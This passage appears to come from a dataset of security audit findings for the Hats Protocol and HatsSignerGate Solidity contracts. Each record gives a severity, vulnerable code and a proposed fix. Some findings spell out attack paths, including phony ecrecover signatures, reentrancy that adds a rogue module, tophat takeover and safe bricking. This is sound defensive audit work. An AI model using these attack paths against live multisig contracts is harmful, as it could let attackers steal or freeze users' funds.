0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, \"LENGTH_MISMATCH\");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\nчConsider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.чThis will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projectsч```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n -[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`чmediumч`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSingerCount` increased, the `_removeSigner` reduces one.чCheck if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\nчThis can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.ч```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n -Safe threshold can be set above target threshold, causing transactions to revertчmediumчIf a `targetThreshold` is set below the safe's threshold, the `reconcileSignerCount()` function will fail to adjust the safe's threshold as it should, leading to a mismatch that causes all transactions to revert.\\nIt is possible and expected that the `targetThreshold` can be lowered, sometimes even lower than the current safe threshold.\\nIn the `setTargetThreshold()` function, there is an automatic update to lower the safe threshold accordingly. However, in the event that the `signerCount < 2`, it will not occur. This could easily happen if, for example, the hat is temporarily toggled off.\\nBut this should be fine! In this instance, when a new transaction is processed, `checkTransaction()` will be called, which calls `reconcileSignerCount()`. This should fix the problem by resetting the safe's threshold to be within the range of `minThreshold` to `targetThreshold`.\\nHowever, the logic to perform this update is faulty.\\n```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n\\nAs you can see, in the event that the `validSignerCount` is lower than the target threshold, we update the safe's threshold to `validSignerCount`. That is great.\\nIn the event that `validSignerCount` is greater than threshold, we should be setting the safe's threshold to `targetThreshold`. However, this only happens in the `else if` clause, when `currentThreshold < target`.\\nAs a result, in the situation where `target < current <= validSignerCount`, we will leave the current safe threshold as it is and not lower it. This results in a safe threshold that is greater than `targetThreshold`.\\nHere is a simple example:\\nvalid signers, target threshold, and safe's threshold are all 10\\nthe hat is toggled off\\nwe lower target threshold to 9\\nthe hat is toggled back on\\n`if` block above (validSignerCount <= target && validSignerCount != currentThreshold) fails because `validSignerCount > target`\\nelse `if` block above (validSignerCount > target && currentThreshold < target) fails because `currentThreshold > target`\\nas a result, `newThreshold == 0` and the safe isn't updated\\nthe safe's threshold remains at 10, which is greater than target threshold\\nIn the `checkAfterExecution()` function that is run after each transaction, there is a check that the threshold is valid:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nThe `_getCorrectThreshold()` function checks if the threshold is equal to the valid signer count, bounded by the `minThreshold` on the lower end, and the `targetThreshold` on the upper end:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nSince our threshold is greater than `targetThreshold` this check will fail and all transactions will revert.чEdit the if statement in `reconcileSignerCount()` to always lower to the `targetThreshold` if it exceeds it:\\n```\\n// Remove the line below\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n// Add the line below\\nif (validSignerCount <= target) {\\n newThreshold = validSignerCount;\\n// Remove the line below\\n} else if (validSignerCount > target && currentThreshold < target) {\\n// Add the line below\\n} else {\\n newThreshold = target;\\n}\\n// Remove the line below\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n// Add the line below\\nif (newThreshold != currentThreshold) { // rest of code update safe threshold // rest of code }\\n```\\nчA simple change to the `targetThreshold` fails to propagate through to the safe's threshold, which causes all transactions to revert.ч```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n -If signer gate is deployed to safe with more than 5 existing modules, safe will be brickedчmediumч`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.чThe `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\nчIf a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.ч```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n -If a hat is owned by address(0), phony signatures will be accepted by the safeчmediumчIf a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.чThe easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.чIf a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.ч```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n -Swap Signer fails if final owner is invalid due to off by one error in loopчmediumчNew users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.чPerform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\nчWhen only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.ч```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n -targetThreshold can be set below minThreshold, violating important invariantчmediumчThere are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.чPerform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\nчSettings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.ч```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n -Hats can be overwrittenчmediumчChild hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.чCheck if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, \"Admin not created\")\\n```\\nчч```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n -Unlinked tophat retains linkedTreeRequests, can be ruggedчhighчWhen a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to \"takeover\" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a \"request\" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permissionчIn `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\nчTophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.ч```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n -Safe can be bricked because threshold is updated with validSignerCount instead of newThresholdчhighчThe safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.чChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\nчAll transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which reч```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n -Signers can bypass checks to add new modules to a safe by abusing reentrancyчhighчThe `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will passчUse a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.чAny number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -If another module adds a module, the safe will be brickedчhighчIf a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the \"before\" check uses `enabledModuleCount` and the \"after\" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the \"before\" check would clip off the final modules, and the \"after\" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the \"before\" and \"after\" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.чThe module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.чThe safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -Signers can brick safe by adding unlimited additional signers while avoiding checksчhighчThere are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count 